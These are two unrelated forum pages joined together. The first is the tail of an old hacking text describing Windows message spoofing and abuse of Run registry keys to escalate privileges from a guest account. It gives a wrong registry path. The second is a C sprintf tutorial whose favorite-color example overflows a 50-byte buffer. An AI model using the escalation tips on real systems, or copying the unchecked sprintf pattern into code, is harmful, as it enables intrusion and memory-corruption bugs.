Win32 platforms are build on two mechanisms, API's and Windows Messaging. The last one is the one we are interested in. What the windows messaging structure does is send actions and happenings to a program using the SendMessage() function. win32 C++ programmers will recognize this from the callback function required for a windows application to work properly. The message system controls a lot of functions, such as dropdown boxes, timers, dialogs and user input. The problem with this structure is that there is no way for the message structure to see where the "Message" came from, so the user can send any message and achieve the same results as explorer.exe would. (not up to date, microsoft has kind of locked functions like timer functions, to keep memory jumping from happening). Simple exploiting: look up the SendMessage API from msdn.
=
2.4 Auto start-up exploiting
=
Any instructions that windows uses on what applications to execute at a user log-in are insecure! Any user can edit regedit and put a file in the HKEY_LOCAL_USER\software\microsoft\windows\run directory, or any other way of starting up. This means an attacker with a guest account can edit the registery to open a bot that edits or makes a user account with elevated privileges. This can also be used to copy whole secured directory's, or phising for a password from the administrator.
=

---

3. Greetz!
=
Ugh, I always forget someone sad.gif Anyhows, Greetz go out to: Xander, Dumbtech(B3N`), Darkblue, Michiel, Barnzey, Sekio, SOAD2k, Legibleskate (wherever he is), Sheephead, Raven and the whole TGS Crew, hackerlounge and it's members, EA games for keeping me entertained and anyone who I respect but forgot (damn, I'm so sorry).

---

4. Advertisements, copyright and other bullshit no-one will read
=
Dont copy/edit/disrespect my shit, visit djblade.b3n.cc for great music and C++ source codes and go to euroadrenaline.com!
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2007 Invision Power Services, Inc.


0----------------------------------------




Help - Search - Members - Calendar
Full Version: Sprintf Tutorial in C
rohitab.com - Forums > Community > Tutorials
Master Nokia1
Nov 27 2004, 07:35 PM
How to use Sprintf()


To understand how to use sprintf, you should know how sprintf is defined(in <stdio.h> header).
It is defined as such:
int  sprintf ( char * buffer, const char * format [ , argument , ...] );

Ill explain the following piece by peice:

Buffer:
The buffer is the place to store the resulting string from using the function(notice its also a pointer. so it points to the specific buffer in memory)

Format:
This is the string that contains the text to be printed.
It can also be used to contain format tags

Format flags should follow this:

%[flags][width][.precision][modifiers]type

The types that youll insert are explained here:
Type - Description - Example
c      | Character    | a
e      |Sci Notation  | 1.42e34
E      |Sci Notation  | 1.42E34
f       |Dec. Float    | 193.53
o      |Signed Octal | 610
d or i |Integer        | 32
s      | String         | sprintf rocks
u      |unsigned Dec| 43525
p      |Address point| A340:0000
x      |Hexadecimal  | 3fa
X      |Hexadecimal  | 3FA
n      |Nothing         |

The diffences between x and X or e and E is that they print capital letters instead of lower case(3fa would be printed with x and 3FA would be printed with X)

The flags, width, .precision, modifiers are completely optional but if youd like to input them heres what they are:

Flags          -          Description
-               | Left align the with given width(right is default)
+              | Forces to preced with positive/negative sign(- is default)
blank         | If the arg is + signed then a blank is inserted before
#              |1. Used with f, e, E makes output contain decimal
               |2. Used with x, X, o value is preced with 0, 0x, 0X


width         -         Description
number       |   Minimum number of characters to be printed   If the value to be printed is shorter than this number the result is padded with blanks. The value is never truncated even if the result is larger.

0number      | Same as above but filled with 0s instead of blanks.

*                | The width is not specified in the format string, it is specified by an integer value preceding the argument thas has to be formatted.

.precision:
for d, i, o, u, x, X types: precision specifies the minimum number of decimal digits to be printed. If the value to be printed is shorter than this number the result is padded with blanks. The value is never truncated even if the result is larger.(if nothing specified default is 1).
for e, E, f types: number of digits to be printed after de decimal point. (if nothing specified default is 6).
for g, G types : maximum number of significant numbers to be printed.
for s type: maximum number of characters to be printed. (default is to print until first null character is encountered).
for c type : (no effect).

Thats the best description i could find

modifier                 -          Description
h                         | Interpreted as a short int
l                          | Interpreted as a long int(integers) or double (floats)
L                         | Interpreted as a long double(floats)

The [arguments] command is an elipses so you can put as many types of arguments as you want.

That should be enough information for you guys to understand most of whats going on

heres a few sprintf() examples for everybody:
CODE
#include <stdio.h>
// ^ must include to use sprintf()
// we will start with a simple integer ex.
int main()
{
char buff[50];
int ret, a = 34, b = 234;
ret = sprintf(buff, "%d minus %d equals %d",a,b,a-b);
printf ("(%s) is the result of our sprintf, which is %d characters long",buff,ret);
return 0;
}


CODE
#include <stdio.h>
//we'll have this string tutorial then
int main()
{
char buff[50], string[100];
int ret;
printf("What is your favorite color??\n");
scanf("%s",&string);
ret = sprintf(buff, "your favorite is %s!! Mine is too",string);
printf("%s",buff);
}


CODE
#include <stdio.h>
//hex and oct examples
int main()
{
char buff[50];
int ret, hex = 4325, oct = 5626;
ret = sprintf(buff, "%x is %d in hex and %o is %d in octal",hex,hex,oct,oct);
printf("%s, %d chars long", buff, ret);
return 0;
}


note: You dont need the return values. (ret in all the examples, they are just to see how long the strings are)

sidenote:
I apologize for the crappy tables
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2007 Invision Power Services, Inc.


------------------------------